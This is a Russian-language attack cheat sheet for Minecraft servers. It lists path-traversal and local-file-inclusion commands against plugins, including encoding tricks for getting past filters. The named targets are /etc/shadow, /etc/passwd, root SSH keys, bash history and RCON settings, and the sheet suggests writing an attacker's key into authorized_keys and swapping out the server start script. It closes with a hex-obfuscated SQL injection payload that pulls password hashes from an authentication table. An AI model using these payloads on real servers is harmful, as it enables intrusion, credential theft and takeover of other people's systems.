-----------------------------------------------------
                     Раздел 1
                   java.io.file
-----------------------------------------------------

./\ корневая папка (альтернатива /)
../
../\ - На директорию ниже

xxxx/xxxx - папка/файл

Примеры обычной атаки
/hd readtext ../LuckPerms/config
/pg load ../../Survival/MyCommand-4.5.2
/dh clone 123 ../config

Создание папок
/dh clone 123 /../../../.ssh/любойТекст/../

Попытка обхода фильтра, если LFI хуево зафикшено
/hd readtext govno/../../../server.properties

Также в случае если плагин не дает выбор директории, но дает название можно эксплуатировать так
../../папка/имя
/dh create LFI пейлоад
можно использовать LFI пейлоад даже в имени файла иногда (если использование папок не предусмотрено) как было с cmi

Обход путем декодирования # Это указано во многих гайдах, но не адаптировано под Minecraft-чат
[!] Загружаем расширение, способное к подмене символов при обработке команды. (К примеру ASCII, Unicode)
/papi cmdparse me hd readtext %ascii_46%%ascii_46%%ascii_47%%ascii_46%%ascii_46%%ascii_47%server.properties
так же можно использовать юникод символ перехода строки для обхода записи ваших данных с мусором \n или 000A

Хорошие директории:

Смотрим в какой сервер запущен директории и вылазим на столько выше сколько директория плагина. Будем исходить из директории папочки с плагинами.
/../../../../../root/.ssh/authorized_keys в случае записи можно записать свой ключ для входа в систему, либо прочитав узнать пк админа
/../../../../../root/.bash_history команды исполненные тортом в шелле
/../../../../../etc/passwd файл с информацией о пользователях системы
/../../../../../etc/shadow файл с хешами пользователей
/../../../../../root/.ssh/id_* файл с ssh ключём (* меняем на тип ключа пример ed25519)
plugins/../start.sh скрипт запуска Майнкрафт сервера (можно подменить чем нибудь интересным)
plugins/папка плагина/config.yml конфиг (могут содержаться полезные данные)
plugins/../server.properties данные ркона
plugins/../paper.yml (в новых версиях paper /config/paper-global.yml) ключ калосити
позже ещё распишу
/root/ меняем на папку пользователя от которого запущен сервер/в папку которого мы хотим попасть

-----------------------------------------------------
                     Раздел 2
                       YAML
-----------------------------------------------------

Категория:

value1.value2 - Воспримет как: value1:
                                 value2

Вводное значение:
# - Комментирование (Обязательно чтобы перед этим стоял пробел)

-----------------------------------------------------
                     Раздел 3
                       SQL
-----------------------------------------------------

Обфускация String-значений
Переходим сюда -> https://devtoolspro.vercel.app/hex-encode/
вписываем String значение, преобразуем его так
0x[ПЕЙЛОАД БЕЗ СКОБОК]
Например:
0x617078756e34353663756c6d6132
Готовый примерчик:
/joiner text ',text=if(name=0x617078756e34353663756c6d6132,(select mid(password,1,40)from mc_auth_accounts where username=0x68616b65723333335f79745f),'');--
